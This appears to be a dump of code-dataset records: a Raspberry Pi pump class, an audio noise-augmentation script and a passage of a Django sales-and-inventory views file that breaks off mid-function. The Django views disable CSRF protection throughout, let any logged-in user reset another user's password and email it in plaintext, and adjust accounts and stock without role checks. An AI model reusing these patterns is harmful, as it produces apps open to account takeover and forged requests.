__repr__(self):\n return b\" \".join(w.lemma_or_surface().encode('utf8')\n for w in self.candidate)\n\n \n################################################################################\n \nif __name__ == \"__main__\" :\n import doctest\n doctest.testmod() \n","sub_path":"LANGAGE_NATUREL/Nazim/TP1/bin/mwetoolkit/bin/libs/base/mweoccur.py","file_name":"mweoccur.py","file_ext":"py","file_size_in_byte":6782,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"147035332","text":"import RPi.GPIO as GPIO\nimport time\n\nclass Pump():\n def __init__(self):\n self.name = None\n self.pin = None\n GPIO.setmode(BCM)\n\n \n def set_name(self, name):\n self.name = str(name)\n \n def set_pin(self, pin):\n try: \n float(pin)\n if pin.is_integer() and pin > 0 and pin <= 27:\n self.pin = pin\n GPIO.setup(pin, GPIO.OUT)\n GPIO.output(pin, GPIO.HIGH)\n except ValueError:\n print(\"Must be a valid integer\")\n\n def do(self, t):\n if self.pin is not None:\n GPIO.output(self.pin, GPIO.LOW)\n time.sleep(t)\n GPIO.output(self.pin, GPIO.HIGH)\n else:\n print(\"Must set GPIO pin for %s\" % self.name)\n\n \n ","sub_path":"ceaos_pump/pump.py","file_name":"pump.py","file_ext":"py","file_size_in_byte":786,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"518340699","text":"import random\nimport numpy as np\nfrom scipy import signal\nimport sys\nimport os\nimport soundfile as sf\n\n# Load support lib\nfrom supplib import ReadList\nfrom supplib import copy_folder\nfrom supplib import load_IR\nfrom supplib import shift\n\n# Reading input arguments\nin_folder=sys.argv[1] # input folder\nout_folder=sys.argv[2] # output folder\nlist_file=sys.argv[3] # list file (\"wav_file IR_file\")\n\n\n# Read List file\n[list_sig,list_ir,list_bck_noise]=ReadList(list_file)\n\n# Replicate input folder structure to output folder\ncopy_folder(in_folder,out_folder)\n\n# Speech Data Reverberation Loop\nfor i in range(len(list_sig)): \n \n # Open clean wav file\n #[fs, signal_clean] = wavfile.read(list_sig[i])\n [signal_clean, fs] = sf.read(list_sig[i])\n\n signal_clean=signal_clean.astype(np.float64)\n\n # Signal normalization\n signal_clean=signal_clean/np.abs(np.max(signal_clean))\n \n # Open background_noise signal\n \n [background_noise, fs1] = sf.read(list_bck_noise[i])\n background_noise=background_noise.astype(np.float64)\n background_noise=background_noise.flatten()\n # background_noise normalization\n \n background_noise=background_noise/np.abs(np.max(background_noise))\n\n # Open Impulse Response (IR)\n\n IR=load_IR(list_ir[i])\n\n # IR normalization\n IR=IR/np.abs(np.max(IR))\n p_max=np.argmax(np.abs(IR))\n \n signal_rev=signal.fftconvolve(signal_clean, IR, mode='full')\n\n # Normalization\n signal_rev=signal_rev/np.max(np.abs(signal_rev))\n \n # IR delay compensation\n signal_rev=shift(signal_rev, -p_max)\n\n # Cut reverberated signal (same length as clean sig)\n signal_rev=signal_rev[0:signal_clean.shape[0]]\n\n #add background noise to reverberated signal\n b = len(signal_rev)\n a = len(background_noise)\n c = random.randint(0,a-b)\n d = background_noise[c:c+b]\n signal_rev_add_noise = d + signal_rev\n \n # Save Reverberated Speech\n file_out=list_sig[i].replace(in_folder, out_folder)\n #wavfile.write(file_out,fs,signal_rev)\n sf.write(file_out, signal_rev_add_noise, fs)\n \n print(\"Done %s\" % (file_out))\n\n\n\n\n\n","sub_path":"add_noise.py","file_name":"add_noise.py","file_ext":"py","file_size_in_byte":1993,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"594205441","text":"from django.shortcuts import render,get_object_or_404,redirect\nfrom django.http import HttpResponse,HttpResponseRedirect\nfrom django.views import View\nfrom django.contrib import messages\nfrom .models import Sales,Store,Employee,Company,Customer,Inventory,Item,Account,Expense\nfrom .forms import ItemForm\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.contrib.auth.models import User\nfrom django.contrib.auth import authenticate,login,logout\nfrom django.contrib.auth.decorators import login_required\nfrom django.core.mail import send_mail\n\nfrom django.contrib.auth.mixins import LoginRequiredMixin\nfrom django.db.models import Count, F, Value\n\nimport csv\n# Create your views here.\n\npathselector={1:'base',2:'base',3:'order',4:'expense',5:'counter'}\n\nprivillage={'sales':3,'admin':1,'assistantadmin':2,'bursar':4,'godown':5}\n# hnishael@gmail.com\n\nimport datetime\nfrom inventory.utils import render_to_pdf ,render_to_pdf_with_image #created in step 4\nfrom django.template.loader import get_template\nfrom django.db.models import Sum\nfrom django.db.models import Q\nfrom django.http import JsonResponse\nfrom django.db.models import Avg,Sum\nfrom datetime import timedelta\nfrom django.utils import timezone\n\ndef delete_recovery(object):\n\tpass\n\ndef soft_delete(object):\n\tpass\n\ndef check_correct_uniqueness():\n\t# list for holding the customers' names while going throught them in the database\n\ttempcustomer=[]\n\n\t# using raw query so as to by bass the deliberate limitation that were overidden in the model class of not getting all the rows within an entitty \n\n\t# getting all customers, deleted(dead) and not deleted( alive)\n\tcustomers = Customer.objects.raw('select * from inventory_customer where deleted_at is not null or deleted_at is null')\n\n\t# going through the customers\n\tfor index,customer in enumerate(customers):\n\t\tprint(\"Customer: \"+str(index))\n\t\t# check if the list contains a customer name\n\t\tif tempcustomer.__contains__(customer.customer_name):\n\t\t\t# if yes\n\t\t\t# modify the customer name and store it temporarly\n\t\t\tnew_customer_name=customer.customer_name+str(tempcustomer.count(customer.customer_name))\n\n\t\t\tcount=0\n\n\t\t\t# check if the newly modifed customer is in the list also\n\t\t\twhile(tempcustomer.__contains__(new_customer_name)):\n\t\t\t\t# if yes modify the new customer name till its is not found in the list\n\t\t\t\tnew_customer_name=new_customer_name+str(count)\n\t\t\t\tcount+=1\n\n\t\t\t# now add the new customer name to the customer list\n\t\t\ttempcustomer.append(new_customer_name)\n\t\t\t# modify the customer name in the database to the new customer name\n\t\t\tcustomer.customer_name=new_customer_name\n\t\t\t# save the customer \n\t\t\tcustomer.save()\n\t\t\t\n\t\telse:\n\t\t\t# if customer name not in list \n\t\t\t# add it to the customer list\n\t\t\ttempcustomer.append(customer.customer_name)\n\n\tprint('done')\n\n\n@csrf_exempt\n@login_required(login_url='/login/')\ndef getGraphBata(request, *args, **kargs):\n\t# check_correct_uniqueness()\n\tprint('graph')\n\tdays_dict={1:'Monday',2:'Tuesday',3:'Wednesday',4:'Thursday',5:'Friday',6:'Sartuday',7:'Sunday'}\n\n\tdef deltaSelect(day):\n\t\tdelta=datetime.date.today().isocalendar()[2]-day\n\t\tprint(delta)\n\t\tif delta<0:\n\t\t\tprint(delta)\n\t\t\tdelta=7+delta\n\t\treturn delta\n\n\tsunday=datetime.date.today()-timedelta(days=deltaSelect(0))\n\tmonday=datetime.date.today()-timedelta(days=deltaSelect(1))\n\ttuesday=datetime.date.today()-timedelta(days=deltaSelect(2))\n\twednesday=datetime.date.today()-timedelta(days=deltaSelect(3))\n\tthursday=datetime.date.today()-timedelta(days=deltaSelect(4))\n\tfriday=datetime.date.today()-timedelta(days=deltaSelect(5))\n\tsartuday=datetime.date.today()-timedelta(days=deltaSelect(6))\n\t\n\tsunday_sales=Sales.objects.filter(created_at__gte=sunday,created_at__lt=sunday+timedelta(days=1)).aggregate(Sum('sales_amount'))['sales_amount__sum']\n\tmonday_sales=Sales.objects.filter(created_at__gte=monday,created_at__lt=monday+timedelta(days=1)).aggregate(Sum('sales_amount'))['sales_amount__sum']\n\ttuesday_sales=Sales.objects.filter(created_at__gte=tuesday,created_at__lt=tuesday+timedelta(days=1)).aggregate(Sum('sales_amount'))['sales_amount__sum']\n\twednesday_sales=Sales.objects.filter(created_at__gte=wednesday,created_at__lt=wednesday+timedelta(days=1)).aggregate(Sum('sales_amount'))['sales_amount__sum']\n\tthursday_sales=Sales.objects.filter(created_at__gte=thursday,created_at__lt=thursday+timedelta(days=1)).aggregate(Sum('sales_amount'))['sales_amount__sum']\n\tfriday_sales=Sales.objects.filter(created_at__gte=friday,created_at__lt=friday+timedelta(days=1)).aggregate(Sum('sales_amount'))['sales_amount__sum']\n\tsartuday_sales=Sales.objects.filter(created_at__gte=sartuday,created_at__lt=sartuday+timedelta(days=1)).aggregate(Sum('sales_amount'))['sales_amount__sum']\n\tprint('today')\n\tprint(datetime.datetime.now())\n\tprint('iso calender position for today')\n\tprint(datetime.date.today().isocalendar()[2])\n\n\ttoday_sales=Sales.objects.filter(created_at__gte=datetime.date.today(),created_at__lt=datetime.date.today()+timedelta(days=1)).aggregate(Sum('sales_amount'))['sales_amount__sum']\n\tprint('today\\'s date:{}'.format(datetime.date.today()))\n\tprint('today:{}'.format(today_sales))\n\tprint('Date monday:{}'.format(monday))\n\tprint(\"Sales monday:{}\".format(monday_sales))\n\tprint('Date tuesday:{}'.format(tuesday))\n\tprint(\"Sales tuesday:{}\".format(tuesday_sales))\n\tprint('Date wednesday:{}'.format(wednesday))\n\tprint(\"Sales wednesday:{}\".format(wednesday_sales))\n\tprint('Date thursday:{}'.format(thursday))\n\tprint(\"Sales thursday:{}\".format(thursday_sales))\n\tprint('Date friday:{}'.format(friday))\n\tprint(\"Sales friday:{}\".format(friday_sales))\n\tprint('Date sartuday:{}'.format(sartuday))\n\tprint(\"Sales sartuday:{}\".format(sartuday_sales))\n\tprint('Date sunday:{}'.format(sunday))\n\tprint(\"Sales sunday:{}\".format(sunday_sales))\n\t\n\tdata_to_display=arrrange_days_forgraph(days=[\"Monday\", \"Tuesday\", \"Wednesday\", \"Thursday\", \"Friday\", \"Sartuday\",\"Sunday\"],data=[monday_sales,tuesday_sales,wednesday_sales,thursday_sales,friday_sales,sartuday_sales,sunday_sales])\n\n\tdata = {\n\t 'data': data_to_display[\"values\"],\n\n\t 'label':data_to_display[\"days\"],\n\t 'order_id': 1233434,\n\t}\n\t\n\treturn JsonResponse(data)\n\n\ndef arrrange_days_forgraph(data=None,days=None):\n\tdays_value=[]\n\tarranged_days=[]\n\t\n\tdays_position=[]\t\n\t# getting sequence of the previous days\n\tfor index in range(7):\n\t\tdays_position.append((datetime.date.today()-timedelta(days=index)).isocalendar()[2])\n\n\tprint(\"position of says in sequence\")\n\tprint(days_position)\t\n\n\t# arranging the days in appropriate sequence\n\tfor position in days_position:\n\t\tprint(position)\n\t\tarranged_days.append(days[position-1])\n\n\tprint(\"new arranged days\")\n\tprint(list(reversed(arranged_days)))\n\n\t# the values in appropiate sequence\n\tfor position in days_position:\n\t\tprint(position)\n\t\tif data[position-1] is None:\n\t\t\tdata[position-1]=0\n\t\t\tprint(0)\n\t\tdays_value.append(data[position-1])\n\n\tprint(\"new arranged data\")\n\tprint(list(reversed(days_value)))\n\n\t# define a function that goes down to zero from today's iso value\n\n\t# define a function that goes down to todays iso value from the maximum value\n\n\t# oneach funciton append the values to the approrpiacte list for return to the frontend graph for drawing \n\n\treturn {\"days\":list(reversed(arranged_days)),\"values\":list(reversed(days_value))}\n\t\n\n\n@csrf_exempt\n@login_required(login_url='/login/')\ndef OrderPdf(request, *args, **kwargs):\n\tprint('oldpdf')\n\n\tdata = {\n\t 'today': datetime.date.today(), \n\t 'amount': 39.99,\n\t 'customer_name': 'Cooper Mann',\n\t 'order_id': 1233434,\n\t}\n\n\tpdf = render_to_pdf('inventory/pdforder.html', data)\n\treturn HttpResponse(pdf, content_type='application/pdf')\n\n\n@csrf_exempt\n@login_required(login_url='/login/')\ndef OrderPdf_Auto(request, *args, **kwargs):\n\tcustomer=Customer.objects.get(id=kwargs['id'])\n\tif request.user.employee.employee_privillage<=privillage['assistantadmin']:\n\t\tsales=Sales.objects.filter(Q(sales_authorized=False )|Q(sales_method_payment='loan'),customer=customer)\n\telse:\n\t\tuser=request.user\n\n\t\tsales=Sales.objects.filter(sales_received=False,user=request.user,customer=customer)\n\temployee= Employee.objects.get(user=request.user)\n\titems = Item.objects.all()\n\ttotal=sales.aggregate(Sum('sales_amount'))\n\tprint(total)\n\n\tprint('custoemrid')\n\tprint(kwargs['id'])\n\ttemplate = get_template('inventory/pdforder.html')\n\tcontext = {\n\t\"logo\":\"/static/inventory/oceanicpicjpg.png\",\n\t \"order_id\": 123,\n\t \"customer_name\": \"John Cooper\",\n\t \"amount\": 1399.99,\n\t \"today\": datetime.date.today(),\n\t 'orders':sales,\n\t 'customer':customer,\n\t 'items':items,\n\t 'employee':employee,\n\t 'amount':'Tsh {:,.2f}'.format(total['sales_amount__sum']),\n\t}\n\n\thtml = template.render(context)\n\tpdf = render_to_pdf_with_image('inventory/pdforder.html', context)\n\n\tif pdf:\n\t\tresponse = HttpResponse(pdf, content_type='application/pdf')\n\t\tfilename = \"{}_{}_Order.pdf\".format(customer.customer_name,datetime.date.today())\n\t\tcontent = \"inline; filename='%s'\" %(filename)\n\t\tdownload = request.GET.get(\"download\")\n\t\tif download:\n\t\t\tcontent = \"attachment; filename='%s'\" %(filename)\n\t\tresponse['Content-Disposition'] = content\n\t\treturn response\n\treturn HttpResponse(\"Not found\")\n\n\n@csrf_exempt\n@login_required(login_url='/login/')\ndef resetPassword(request,*args,**kargs):\n\n\tuser= User.objects.get(id=kargs['id'])\n\n\tprint('gotcha create something')\n\timport random\n\timport string\n\n\tdef generateRoandom(size=4,chars=string.ascii_lowercase+string.ascii_uppercase+string.digits):\n\n\t\treturn ''.join(random.choice(chars) for _ in range(size))\n\n\tpassword=generateRoandom(8)\n\n\tuser.set_password(password)\n\tuser.save()\n\temployee=Employee.objects.get(user=user.id)\n\n\tadmin = Employee.objects.filter(employee_privillage=1)\n\n\t# email=admin.first().employee_email\n\n\temail=User.objects.get(id=request.user.id).employee.employee_email\n\t\n\n\t# sending login credential to admin or user them selves\n\tsend_mail(\n\t\t 'Resetin Password',\n\t\t 'OCEANIC \\n firstname :'+employee.employee_firstname+'\\n'+'username :'+user.username+'\\n password: '+password,\n\t\t 'info.company.tz@gmail.com',\n\t\t [email],\n\t\t fail_silently=False,\n\t\t \n\t\t)\n\n\treturn HttpResponse('done')\n\n\n@csrf_exempt\n@login_required(login_url='/login/')\ndef ChangePassword(request,*args,**kargs):\n\tuser = authenticate(request, username=kargs['username'], password=kargs['oldpassword'])\n\n\tif user is not None:\n\n\t\tif kargs['firstnewpassword'] == kargs['secondnewpassword']:\t\t\n\t\t\tuser.set_password(kargs['firstnewpassword'])\n\t\t\tuser.save()\n\t\t\treturn HttpResponse('good')\n\t\telse:\n\t\t\treturn HttpResponse('notmatched')\n\n\telse:\n\t\treturn HttpResponse('badold')\n\n@csrf_exempt\n@login_required(login_url='/login/')\ndef ChangeUsername(request,*args,**kargs):\n\ttry:\n\t\tuser=User.objects.get(username=kargs['username'])\n\n\texcept Exception as e:\n\t\tUser.objects.filter(id=kargs['id']).update(username=kargs['username'])\n\t\treturn HttpResponse('good')\n\telse:\n\t\treturn HttpResponse('bad')\n\n\n@csrf_exempt\n@login_required(login_url='/login/')\ndef ItemFile(request,*args,**kargs):\n\n\t# with open(request.FILES['file'],'r') as csv_file:\n\tcsv_file=request.FILES['file']\n\tprint(csv_file.name.endswith('csv'))\n\n\tfile_data=csv_file.read().decode('utf-8')\n\tlines=file_data.split('\\n')\n\t# line_dict=get_lines_dict(lines)\n\n\t# work on this function so as to allow flexibility of csv upload\n\tfor counter, line in enumerate(lines):\n\t\tif counter is 0 :\n\t\t\tcontinue\n\t\tfields=line.split(',')\n\t\t\n\t\tif(len(fields)<2):\n\t\t\tprint(fields)\n\t\telse:\n\t\t\tprint(counter)\n\t\t\texistimg_item,new_item=Item.objects.get_or_create(store=Store.objects.get(id=request.POST['store']),item_name=fields[0],item_size=fields[1])\n\t\t\t# new_customer.save()\n\tprint(\"done , items stored\")\n\treturn HttpResponse('ok')\n\n\n\n@csrf_exempt\n@login_required(login_url='/login/')\ndef CustomerFile(request,*args,**kargs):\n\n\t# with open(request.FILES['file'],'r') as csv_file:\n\t\n\n\tcsv_file=request.FILES['file']\n\tprint(csv_file.name.endswith('csv'))\n\n\tfile_data=csv_file.read().decode('utf-8')\n\tlines=file_data.split('\\n')\n\t# line_dict=get_lines_dict(lines)\n\n\t# work on this function so as to allow flexibility of csv upload\n\n\tfor counter, line in enumerate(lines):\n\t\tif counter is 0 :\n\t\t\tcontinue\n\t\tfields=line.split(',')\n\t\t\n\t\tif(len(fields)<3):\n\t\t\tprint(fields)\n\t\telse:\n\t\t\tprint(counter)\n\t\t\ttry:\n\n\t\t\t\texistimg_customer,new_customer=Customer.objects.get_or_create(company=Company.objects.get(id=request.POST['company']),customer_name=fields[0],customer_phone=fields[2],customer_location=fields[1])\n\t\t\texcept Exception as e:\n\t\t\t\tprint('error: {}'.format(e))\n\t\t\t\tcontinue\n\t\t\t# new_customer.save()\n\tprint(\"Done, Customers stores\")\n\treturn HttpResponse('ok')\n\t\ndef get_lines_dict(file_lines):\n\tatributes_dict={}\n\tlines_dict={}\n\tfor index,line in enumerate(file_lines):\n\t\tif index is 0:\n\t\t\tfields= line.split(',')\n\t\t\tfor pos,field in enumerate(fields):\n\t\t\t\tatributes_dict[pos]=field\n\t\t\t\tlines_dict[field]=[]\n\n\t\t\tbreak\n\n\t\n\tfor index,line in enumerate(file_lines):\n\t\tif index is not 0:\n\t\t\tcells = line.split(',')\n\n\t\t\tfor pos,cell in enumerate(cells):\n\t\t\t\tif len(cell)>1:\n\t\t\t\t\tlines_dict[atributes_dict[pos]].append(cell)\n\n\n\t\t\t\t\n\tprint(lines_dict)\n\treturn lines_dict\n\n\n@csrf_exempt\n@login_required(login_url='/login/')\ndef increaseAccount(request,*args,**kargs):\n\taccount=Account.objects.filter(id=kargs['id'])\n\taccount.update(account_amount=float(account.first().account_amount)+float(kargs['amount']))\n\treturn HttpResponse('ok')\n\n\n@csrf_exempt\n@login_required(login_url='/login/')\ndef decreaseAccount(request,*args,**kargs):\n\taccount=Account.objects.filter(id=kargs['id'])\n\taccount.update(account_amount=float(account.first().account_amount)-float(kargs['amount']))\n\treturn HttpResponse('ok')\n\n@csrf_exempt\n@login_required(login_url='/login/')\ndef updateUpDownAccount(request,*args,**kargs):\n\texpense=Expense.objects.filter(id=kargs['id'])\n\n\taccount=Account.objects.filter(id=expense.first().expense_account.id)\n\taccount.update(account_amount=float(account.first().account_amount)-(float(kargs['amount'])-float(expense.first().expense_amount)))\n\tprint('current expense amount')\n\tprint(float(expense.first().expense_amount))\n\tprint('entered value')\n\tprint(float(kargs['amount']))\n\tprint('balance')\n\tprint(float(account.first().account_amount))\n\tprint('adjusted balance')\n\tadjustedval=float(account.first().account_amount)-(float(kargs['amount'])-float(expense.first().expense_amount))\n\tprint(adjustedval)\n\tprint(kargs['id'])\n\n\t# print(request.POST)\n\treturn HttpResponse(adjustedval)\n\n@csrf_exempt\n@login_required(login_url='/login/')\t\ndef increseItem(request,*args,**kargs):\n\titem=Item.objects.filter(id=kargs['id'])\n\titem.update(item_size=float(item.first().item_size)+float(kargs['quantity']))\n\treturn HttpResponse('ok')\n\t\n\n@csrf_exempt\n@login_required(login_url='/login/')\ndef decreaseItem(request,*args,**kargs):\n\titem=Item.objects.filter(id=kargs['id'])\n\titem.update(item_size=float(item.first().item_size)-float(kargs['quantity']))\n\treturn HttpResponse('ok')\n\n\n@csrf_exempt\n@login_required(login_url='/login/')\ndef AcceptSale(request,*args,**kargs):\n\t\n\tsale=Sales.objects.filter(id=kargs['id'])\n\tupdatesale=sale.update(sales_received=True)\n\t# updating the quantity of item sold \n\n\titem=Item.objects.filter(id=sale.first().item.id)\n\titem.update(item_size=item.first().item_size-sale.first().sales_quantity)\n\n\tprint(kargs['id'])\n\t# print(request.POST)\n\treturn HttpResponse('ok')\n\n# remeber the best way to implemet a sale order and handling loans is by implementing a whole new order table linked to the sales table \n# due to the sake of time and inconvinience a hack around is implemented by navingating some boolean fields in the sales table and paymet_methods column and balaance column is added for this exact purpose\n# in future a much more simpler implementation should eliminate this processing bottleneck\n\n@csrf_exempt\n@login_required(login_url='/login/')\ndef restoreCustomerCredit(request,*args,**kargs):\n\tcustomer=Customer.objects.get(id=kargs['customerid'])\n\tsale=Sales.objects.get(id=kargs['saleid'])\n\n\t# if customer has a crdit balance \n\t# you can restore the amount \n\tif (sale.sales_piad_with_customer_credit):\n\t\tprint(\"credit restore amount\")\n\t\tprint(round(float(kargs['amount'])))\n\t\tcustomer.customer_debit_amount+=round(float(kargs['amount']))\n\t\tcustomer.save()\n\n\n\treturn HttpResponse('ok')\n\n\n\n@csrf_exempt\n@login_required(login_url='/login/')\ndef UpdateCustomerSalesPaymentMethodAuth(request,*args,**kargs):\n\t# customer loan acceptance code\n\tcustomer=Customer.objects.get(id=kargs['customerid'])\n\t# note cash here means the payment method\n\tprint(\"method:\"+kargs['cash'])\n\n\tcustomer_loan_order=Sales.objects.filter(customer=customer,sales_method_payment=\"loan\")\n\n\tcustomer_order_loan_balance=customer_loan_order.aggregate(Sum('sales_balance'))['sales_balance__sum']\n\n\tnumber_of_sales_in_orders=customer_loan_order.count()\n\n\tdef isCreditFree(amountpaid,totalbalance):\n\t\tfree =False\n\t\textra_cash_paid=0\n\t\tif amountpaid >= round(totalbalance):\n\t\t\tfree=True\n\t\t\textra_cash_paid=amountpaid-round(totalbalance)\n\t\treturn [free,extra_cash_paid]\n\n\tif isCreditFree(float(kargs['amount']),customer_order_loan_balance)[0]:\n\t\tupdatedsales=customer_loan_order.update(sales_method_payment=kargs['cash'],sales_balance=F('sales_amount'))\n\n\t\t# record that customer has paid extra\n\n\t\t# adding current extra customer amount to the new extra \n\t\tcustomer.customer_debit_amount+=isCreditFree(float(kargs['amount']),customer_order_loan_balance)[1]\n\t\tcustomer.save()\n\n\t\tprint('no more loan')\n\telse:\n\t\tcurrent_balance=round(customer_order_loan_balance)-float(kargs['amount'])\n\t\t# the actual hack\n\t\t# i save the total loan balance in each order item equally distributing it, for later reconstruction\n\t\tbalance_per_sale=current_balance/number_of_sales_in_orders\n\n\t\tupdatedsales=customer_loan_order.update(sales_balance=balance_per_sale)\n\t\tprint('balance to be paid')\n\t\tprint(current_balance)\n\t\tprint('updated balance')\n\t\tprint(balance_per_sale)\n\t\tprint('updated end')\n\n\treturn HttpResponse('ok')\n\n\n@csrf_exempt\n@login_required(login_url='/login/')\ndef UpdateSalesPaymentMethodAuth(request,*args,**kargs):\n\tprint('taking loan')\n\tsale=Sales.objects.get(id=kargs['saleid'])\n\tprint('amount paid')\n\tprint(float(kargs['amount']))\n\tbalance=sale.sales_balance-float(kargs['amount'])\n\tsale.sales_balance=balance\n\tprint('balance')\n\tprint(balance)\n\tif balance<=0:\n\t\tsale.sales_method_payment=kargs['cash']\n\n\tsale.save()\n\t# updating the quantity of item sold \n\tprint(kargs['saleid'])\n\t# print(request.POST)\n\treturn HttpResponse('ok')\n\n\n@csrf_exempt\n@login_required(login_url='/login/')\ndef UpdateSalesPaymentMethod(request,*args,**kargs):\n\tprint('geting single loan')\n\tsale=Sales.objects.filter(id=kargs['saleid'])\n\tamount=0\n\tupdatesale=sale.update(sales_method_payment=kargs['cash'],sales_balance=F('sales_amount'))\n\n\t# updating the quantity of item sold \n\tprint(kargs['saleid'])\n\t# print(request.POST)\n\treturn HttpResponse('ok')\n\n@csrf_exempt\n@login_required(login_url='/login/')\ndef UpdateCustomerSalesPaymentMethod(request,*args,**kargs):\n\tcustomer=Customer.objects.get(id=kargs['customerid'])\n\tamount=0\n\tprint('multiplesss...')\n\tprint(kargs['cash'])\n\n\t# begin handling of customer credit balance\n\n\tif customer.customer_debit_amount>0:\n\t\t# custoemr has credit balance\n\n\t\t# getting total sales for a customer's order\n\t\tcustomer_total_order=Sales.objects.filter(customer=customer,sales_received=False).aggregate(Sum('sales_amount'))['sales_amount__sum']\n\n\t\t# deducting the credit balance from amount paid for the order\n\n\t\tcustomer_total_order-=customer.customer_debit_amount\n\n\t\t# getting total number of items within the customer order\n\t\tnumber_of_items_in_order=Sales.objects.filter(customer=customer,sales_received=False).count()\n\n\t\tif customer_total_order <0:\n\t\t\t# customer still has credit balance\n\t\t\tcustomer.customer_debit_amount=(-1)*customer_total_order\n\t\t\t# reseting the customer total order\n\t\t\tcustomer_total_order=0\n\n\t\t\t# update each individual sales balance to zero\n\t\t\tupdatesale=Sales.objects.filter(customer=customer,sales_received=False).update(sales_method_payment=kargs['cash'],sales_balance=0,sales_piad_with_customer_credit=True)\n\t\t\tprint(\"customer credit remains: \",customer_total_order*-1)\n\n\t\telse:\n\t\t\t# customer no longer has credit balance\n\t\t\tcustomer.customer_debit_amount=0\n\n\t\t\t# to store the order amount modified by the credit balance, we split the resultant amount into individual units and stroe each unit balance into respective sale within the customers order\n\t\t\t\n\t\t\tbalance_per_item=round(customer_total_order/number_of_items_in_order)\n\n\t\t\t# update the customer sales order with this neer balnce on each item within the order\n\n\t\t\tupdatesale=Sales.objects.filter(customer=customer,sales_received=False).update(sales_method_payment=kargs['cash'],sales_balance=balance_per_item,sales_piad_with_customer_credit=True)\n\n\t\t\tprint(\"balance per item \", balance_per_item)\n\n\t\tcustomer.save()\n\n\telse:\n\t\tupdatesale=Sales.objects.filter(customer=customer,sales_received=False).update(sales_method_payment=kargs['cash'],sales_balance=F('sales_amount'))\n\n\t\t\n\t# end handling of credit balance\n\t\n\treturn HttpResponse('ok')\n\n@csrf_exempt\n@login_required(login_url='/login/')\ndef AuthorizeCustomerOrder(request,*args,**kargs):\n\tcustomer=Customer.objects.get(id=kargs['customerid'])\n\n\tsale=Sales.objects.filter(customer=customer,sales_received=True,sales_authorized=False).update(sales_authorized=True,adminuser=request.user.id)\n\n\treturn HttpResponse('ok')\n\n\n\n@csrf_exempt\n@login_required(login_url='/login/')\ndef AuthorizeSale(request,*args,**kargs):\n\t\n\tsale=Sales.objects.filter(id=kargs['id'])\n\tupdatesale=sale.update(sales_authorized=True,adminuser=request.user.id)\n\n\t# updating the quantity of item sold \n\tprint(kargs['id'])\n\t# print(request.POST)\n\treturn HttpResponse('ok')\n\n\n@csrf_exempt\n@login_required(login_url='/login/')\ndef IssueCustomerOrder(request,*args,**kargs):\n\tcustomer=Customer.objects.get(id=kargs['customerid'])\n\n\tsale=Sales.objects.filter(customer=customer,sales_authorized=True,sales_issue_item=False).update(sales_issue_item=True,issueuser=request.user.id)\n\n\treturn HttpResponse('ok')\n\n\n\n@csrf_exempt\n@login_required(login_url='/login/')\ndef IssueSale(request,*args,**kargs):\n\t\n\tsale=Sales.objects.filter(id=kargs['id'])\n\tupdatesale=sale.update(sales_issue_item=True,issueuser=request.user.id)\n\n\t# updating the quantity of item sold \n\tprint(kargs['id'])\n\t# print(request.POST)\n\treturn HttpResponse('ok')\n\n\n@csrf_exempt\n@login_required(login_url='/login/')\ndef AcceptCustomerOder(request,*args,**kargs):\n\tcustomer=Customer.objects.get(id=kargs['customerid'])\n\tsales=Sales.objects.filter(sales_received=False,customer=customer)\n\tif sales.exists() and sales.count()>=1:\n\t\tfor sale in sales:\n\t\t\tsale.sales_received=True\n\t\t\tsale.save()\n\t\t\t# updating the quantity of item sold \n\t\t\titem=Item.objects.filter(id=sale.item.id)\n\t\t\titem.update(item_size=item.first().item_size-sale.sales_quantity)\n\n\treturn HttpResponse('ok')\n\n\n@csrf_exempt\n@login_required(login_url='/login/')\ndef AcceptSaleAll(request,*args,**kargs):\n\tsales=Sales.objects.filter(sales_received=False)\n\tif sales.exists() and sales.count()>=1:\n\t\tfor sale in sales:\n\t\t\tsale.sales_received=True\n\t\t\tsale.save()\n\t\t\t# updating the quantity of item sold \n\t\t\titem=Item.objects.filter(id=sale.item.id)\n\t\t\titem.update(item_size=item.first().item_size-sale.sales_quantity)\n\n\treturn HttpResponse('ok')\n\n\n\n@csrf_exempt\n@login_required(login_url='/login/')\ndef DeclineCustomerOder(request,*args,**kargs):\n\tcustomer=Customer.objects.get(id=kargs['customerid'])\n\tsales=Sales.objects.filter(sales_received=False,customer=customer)\n\tif sales.exists() and sales.count()>=1:\n\t\tfor sale in sales:\n\t\t\t# updating the quantity of item sold \n\t\t\titem=Item.objects.filter(id=sale.item.id)\n\t\t\titem.update(item_size=item.first().item_size+sale.sales_quantity)\n\t\n\tSales.objects.filter(sales_received=False,customer=customer).delete()\n\t\n\treturn HttpResponse('ok')\n\n@csrf_exempt\n@login_required(login_url='/login/')\ndef DeclineSaleAll(request,*args,**kargs):\n\tsales=Sales.objects.filter(sales_received=False)\n\tif sales.exists() and sales.count()>=1:\n\t\tfor sale in sales:\n\t\t\t# updating the quantity of item sold \n\t\t\titem=Item.objects.filter(id=sale.item.id)\n\t\t\titem.update(item_size=item.first().item_size+sale.sales_quantity)\n\t\n\tSales.objects.filter(sales_received=False).delete()\n\t\n\treturn HttpResponse('ok')\n\nclass MyView(View):\n\tdef get(self,request,*args,**kagrs):\n\t\treturn HttpResponse('hello CBV')\n\n\tdef post(self,request,*args,**kagrs):\n\t\tprint(request.POST['customer'])\n\t\titem=Item.objects.filter(id=request.POST['item'])\n\t\tcustomer=Customer.objects.filter(id=1)\n\t\tsale_order=Sales.objects.create(sales_quantity=request.POST['sales_quantity'],sales_amount=request.POST['sales_amount'],item=item,user=request.user,customer=customer)\n\n\t\tsale_order.save()\n\t\treturn HttpResponse('ok')\n\n\n\nclass HomePage(LoginRequiredMixin,View):\n\tlogin_url = '/login/'\n\tdef get(self,request,*args,**kagrs):\n\t\tform=ItemForm()\n\n\t\tuser = request.user\n\t\t# home page limited to only admin 1 and 2\n\t\tif request.user.employee.employee_privillage <= privillage['assistantadmin']:\n\t\t\treturn render(request,'home/base.html',{'form':form,'user':user})\n\t\telse:\n\t\t\treturn redirect(pathselector[request.user.employee.employee_privillage])\n\n\n\n\n\n@login_required(login_url='/login/')\ndef ViewOrder(request,*args,**kargs):\n\n\tuser = request.user\n\t# access to the order/sales page limited to admin 1 and 2 and sales person 3\n\tif request.user.employee.employee_privillage <= privillage['assistantadmin'] or 